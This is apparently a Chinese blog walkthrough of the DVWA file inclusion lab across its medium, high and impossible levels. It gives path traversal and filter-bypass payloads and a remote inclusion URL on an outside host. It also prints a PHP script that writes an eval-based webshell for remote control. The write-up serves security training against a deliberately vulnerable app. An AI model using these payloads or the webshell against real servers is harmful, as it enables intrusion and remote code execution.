DVWA_File Inclusion 文件包含 远程文件包含拿webshell

时间:2021-07-16 09:37:41

 

 

MEDIUM:

$file = str_replace( array( "http://", "https://" ), "", $file ); 
$file = str_replace( array( "../", "..\"" ), "", $file ); 

  与LOW相比,将四个敏感字符串过滤掉了:"http://", "https://","../", "..\""

 

本地文件包含:

Payload1(相对路径包含):

?page=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\phpStudy\PHPTutorial\WWW\dvwa\php.ini

原理:仔细看看可以发现,"..\"并没有被过滤掉(过滤掉的多了一个双引号)

 

Payload2(相对路径包含):

?page=..././..././..././..././..././..././..././..././..././phpStudy\PHPTutorial\WWW\dvwa\php.ini

原理:str_replace()是非常不安全的,可是双写绕过,比如这个payload,经过str_replace()之后变成了:

?page=../../../../../../../../../phpStudy\PHPTutorial\WWW\dvwa\php.ini ("../"都被替换成了空字符)

 

Payload3(绝对路径包含):

?page=C:\phpStudy\PHPTutorial\WWW\dvwa\php.ini

原理:并没有过滤绝对路径啊

 

远程文件包含:

Payload:?page=htthttp://p://192.168.141.1/hack.php

原理:str_replace()可以双写绕过

 

此外,在这种情况可以通过远程文件包含拿webshell,比如hack.php中可以这么写:

<?php
	$f = fopen('shell.php','w');
	$txt = '<?php eval($_POST[zzz])?>';
	fwrite($f,$txt);
	fclose($f);
?>

  然后菜刀一连就可以,嘿嘿嘿嘿~~~

(可惜笔者无论如何调整设置,allow_url_fopen就是打不开,我怎么办,我也很绝望啊)

 

HIGH:

核心代码:

if( !fnmatch( "file*", $file ) && $file != "include.php" ) { 
    // This isn't the page we want! 
    echo "ERROR: File not found!"; 
    exit; 
} 

代码解读:fnmatch(pattern,string)类似于ereg()或preg_match(),用pattern指定的模式去匹配string。

这里*是通配符,所以"file*"的意思就是必须以file开头。

 

这里看似安全,其实我们可以使用php://file协议绕过

Payload:?page=file://C:\phpStudy\PHPTutorial\WWW\dvwa

php://file用以读取服务器本地文件,而且在allow_url_fopen和allow_url_include双off的情况下依然可以使用!

 

由于php://file只能读取服务器本地文件,所以想要实现任意命令执行,需要文件上传的配合,

将恶意文件上传到服务器之后,使用文件包含进行包含以执行之。

 

IMPOSSBILE:

核心代码:

if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) { 
    // This isn't the page we want! 
    echo "ERROR: File not found!"; 
    exit; 
} 

  可以看到,进行了白名单限制,无法攻破

 

鸣谢:

http://www.storysec.com/dvwa-file-inclusion.html

https://www.freebuf.com/articles/web/119150.html